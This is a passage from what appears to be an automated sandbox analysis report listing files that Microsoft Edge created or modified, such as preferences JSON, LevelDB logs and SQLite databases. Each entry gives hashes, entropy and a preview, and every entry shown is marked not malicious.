                                                                                                                                                                                                      SHA-256:A9856BD474C3DF27D421F511ED674F9D01B9452D7A2CD93F7D9EFA4230720007
                                                                                                                                                                                                      SHA-512:DA79AE59055E631D9D45481F9BB25E899CD1EEAE778AECEDCF5C4B313FC43FF432F6ADB2C7D058FA35ED8D0B20B7E169CE064D5767C1EEE56CA1FBC853732787
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377790396853391","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377790396853391","location":5,"ma
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):12738
                                                                                                                                                                                                      Entropy (8bit):5.277338322495242
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:stZJ99QTryDilbatSuyMszhxyaNP6vkj3q82bV+FiAmWOOGPuYJ:stZPGiSursVxtJ6pbGiHWOv
                                                                                                                                                                                                      MD5:267BCDBF0B4555BA02E57F76E9B2BCE1
                                                                                                                                                                                                      SHA1:1DDC905C39F830FBEEF0B729476283F6E9B730D6
                                                                                                                                                                                                      SHA-256:38014FA3776D1EE1447AB4D90FEF818CF5F80027405CE8FC61F9A33FB58A24FB
                                                                                                                                                                                                      SHA-512:E04E221D647841B44C426CEB7570180E2282801A3E17020A9891B04D559893B97D439D694E1D3E7289C2DBA61B18918B79F24DE04992270C42E2AE61B03AD868
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377790397289529","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):33
                                                                                                                                                                                                      Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                      MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                      SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                      SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                      SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):313
                                                                                                                                                                                                      Entropy (8bit):5.2953501568620736
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjY/F41cNwi23oH+Tcwtp3hBtB2KLlJjYZlAq2PcNwi23oH+Tcwtp3hBWsIFUv:00ZYebp3dFL8WvLZYebp3eFUv
                                                                                                                                                                                                      MD5:36117F3CCDFD7C0F4093EC9116ED07A2
                                                                                                                                                                                                      SHA1:C78026EB25603E62EEBB6E591DDB888A6E807F73
                                                                                                                                                                                                      SHA-256:C063717720ED699478B7212C010EFD995C8005EB286351C2DF8EFA50047108BA
                                                                                                                                                                                                      SHA-512:4056ED1BE207CFA3D54EDB46A3426BF2D272A81C20DEF4408DA5FA7A3F8A78FA6AA8B83EB781A3E8A50990259403EEF3D630CA8131BFE6E9AE4528F7D8AA0ED8
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:23.876 610 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/04-07:53:28.339 610 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                      Size (bytes):1696115
                                                                                                                                                                                                      Entropy (8bit):5.040629334530285
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:kZf76gGkISshcFdmcOAoPENUpifYP+MbI2T:kZfgAmmE
                                                                                                                                                                                                      MD5:660506872AD42911CF61B0B7D5E2F26A
                                                                                                                                                                                                      SHA1:5C6B6E4279F9A65E393DCA40CE5F361D6D5D5CFE
                                                                                                                                                                                                      SHA-256:F8A95DDC921271B69CACABF255FA0C1E65942E536774AAA4F3CCCA093F669417
                                                                                                                                                                                                      SHA-512:6EF9359720C1E284978DCC127643E35511E47D3675050BFC3B32B57D12E75773E90D822C741C8A9A4DCCACBCB97D4F1EF958CA5C6AC08E91D3E329DAAB0308BF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                      Entropy (8bit):5.098469423650309
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjY9slL+q2PcNwi23oH+Tcwt9Eh1tIFUt8mjY9qoKWZmw+mjY9L3lLVkwOcNwi2w:IwL+vLZYeb9Eh16FUt8LmW/+LLVLV54G
                                                                                                                                                                                                      MD5:BDEF4DEA7A4F91CEDFF1498C0521DA64
                                                                                                                                                                                                      SHA1:DBF24B5DFAF79EF9DBF249F3B44DA27DADA59C33
                                                                                                                                                                                                      SHA-256:3F41EFE8EBC45330F62C6069D993F2DFA9D72D8947CCA7EDDFF8352B8415EF6F
                                                                                                                                                                                                      SHA-512:61BB7F6BBB006B9FB9ACCD7897A66084770AE5F63EEA1BF2BE5BB45E95BA6320D782A0361F1FB45C395F78E99A98A37617BB9E4BD52952C8B2A7C3BB35A12209
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:24.403 205c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/04-07:53:24.404 205c Recovering log #3.2024/12/04-07:53:24.453 205c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                      Entropy (8bit):5.098469423650309
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjY9slL+q2PcNwi23oH+Tcwt9Eh1tIFUt8mjY9qoKWZmw+mjY9L3lLVkwOcNwi2w:IwL+vLZYeb9Eh16FUt8LmW/+LLVLV54G
                                                                                                                                                                                                      MD5:BDEF4DEA7A4F91CEDFF1498C0521DA64
                                                                                                                                                                                                      SHA1:DBF24B5DFAF79EF9DBF249F3B44DA27DADA59C33
                                                                                                                                                                                                      SHA-256:3F41EFE8EBC45330F62C6069D993F2DFA9D72D8947CCA7EDDFF8352B8415EF6F
                                                                                                                                                                                                      SHA-512:61BB7F6BBB006B9FB9ACCD7897A66084770AE5F63EEA1BF2BE5BB45E95BA6320D782A0361F1FB45C395F78E99A98A37617BB9E4BD52952C8B2A7C3BB35A12209
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:24.403 205c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/04-07:53:24.404 205c Recovering log #3.2024/12/04-07:53:24.453 205c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                      Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                      MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                      SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                      SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                      SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                      Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                      MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                      SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                      SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                      SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):354
                                                                                                                                                                                                      Entropy (8bit):5.247847120013859
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUHxOgyq2PcNwi23oH+TcwtnG2tMsIFUt8mjYUHC1Zmw+mjYUHggRkwOcNwi25:xHzyvLZYebn9GFUt8CHU/+CHggR54ZYi
                                                                                                                                                                                                      MD5:254A7A07AB31DF53572E51186063B2BD
                                                                                                                                                                                                      SHA1:9CBEFF4FE01B10B7775736516AFA5EF6703ACA8A
                                                                                                                                                                                                      SHA-256:2C1646194001F6079B90C24847EDF5422D15A84311BA028324CFFE6FFA0EF568
                                                                                                                                                                                                      SHA-512:DFD00AD1678E22707B1CDB5C0F8A8B99E5A0F804B01EB65BF08EA1940CA9A5DFDB48EB68C6864C376AED4EEADE36FE88DB3AE3A2E3EA31D0991D2E41DAD1069B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:16.862 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/04-07:53:16.944 1de4 Recovering log #3.2024/12/04-07:53:16.981 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):354
                                                                                                                                                                                                      Entropy (8bit):5.247847120013859
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUHxOgyq2PcNwi23oH+TcwtnG2tMsIFUt8mjYUHC1Zmw+mjYUHggRkwOcNwi25:xHzyvLZYebn9GFUt8CHU/+CHggR54ZYi
                                                                                                                                                                                                      MD5:254A7A07AB31DF53572E51186063B2BD
                                                                                                                                                                                                      SHA1:9CBEFF4FE01B10B7775736516AFA5EF6703ACA8A
                                                                                                                                                                                                      SHA-256:2C1646194001F6079B90C24847EDF5422D15A84311BA028324CFFE6FFA0EF568
                                                                                                                                                                                                      SHA-512:DFD00AD1678E22707B1CDB5C0F8A8B99E5A0F804B01EB65BF08EA1940CA9A5DFDB48EB68C6864C376AED4EEADE36FE88DB3AE3A2E3EA31D0991D2E41DAD1069B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:16.862 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/04-07:53:16.944 1de4 Recovering log #3.2024/12/04-07:53:16.981 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                      Entropy (8bit):0.6123563532496151
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jFUVYCpAV7mL:TO8D4jJ/6Up+li
                                                                                                                                                                                                      MD5:0EAC1EA6D8469BA757D9E1F2E6F812CB
                                                                                                                                                                                                      SHA1:A51816B08827B9F48F5F6C728D94970390C1CA4F
                                                                                                                                                                                                      SHA-256:911E753F9E74965DC1DE18769248332BEBBBD478F487C3CD089199741803D60F
                                                                                                                                                                                                      SHA-512:D684DEBFFC702625AFA72A7C7A675E5203E47C937E49CF9A3D4FAC151A02D60654FFCFB031DD4B29D4CD6CF930F2E411C5BC0DCC63C544648B489FE92B09353D
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):375520
                                                                                                                                                                                                      Entropy (8bit):5.35414633719101
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:bA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:bFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                      MD5:99C5A3D70DE4755DA4A2EF99B99DF011
                                                                                                                                                                                                      SHA1:A60AA31FF70CEDDC05EA75F373D59DD264473DDA
                                                                                                                                                                                                      SHA-256:9ED4B7331EBC4D7AF80CAF27319F2A296297043F9070835DE98EDA1B8128EA39
                                                                                                                                                                                                      SHA-512:58D43F0C03B9A2A2AC315437BA4E5C08FCDAE0B8CFB95C20CABC481DEFE1E36E15C312DB1189D1AB92EE4B675E0BF429674434459F202D800C059A1B9EA305B6
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1.'.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13377790406633440..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):317
                                                                                                                                                                                                      Entropy (8bit):5.166718823976936
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjY93KRRM1cNwi23oH+Tcwtk2WwnvB2KLlJjY9lVq2PcNwi23oH+Tcwtk2WwnvIg:I3KRR2ZYebkxwnvFLwlVvLZYebkxwnQg
                                                                                                                                                                                                      MD5:D166EB23F9179F5D6CA88AC19B7B603A
                                                                                                                                                                                                      SHA1:84841377E4F427557CC083F7CF79D539BCABA706
                                                                                                                                                                                                      SHA-256:C987299D204268A3540314FB9A5D2AA3DBB379AAC50A702235D5B59F7B2158B7
                                                                                                                                                                                                      SHA-512:B21761965211FC39B94CD29B69AA3355E279F20397D3D1ED3D8EFDC071533AA839501BEC96A931BB7BD05494A78865A4ED7503EF68EA5C62CC91935B61D9BE03
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:24.396 2024 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/04-07:53:24.421 2024 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                      Size (bytes):358860
                                                                                                                                                                                                      Entropy (8bit):5.324612808400738
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R7:C1gAg1zfvj
                                                                                                                                                                                                      MD5:752A63D29E5FBF0AF7CBF2FAC3246FF3
                                                                                                                                                                                                      SHA1:D8E561445E75CE5648A4BF358DC217EFFCFACA18
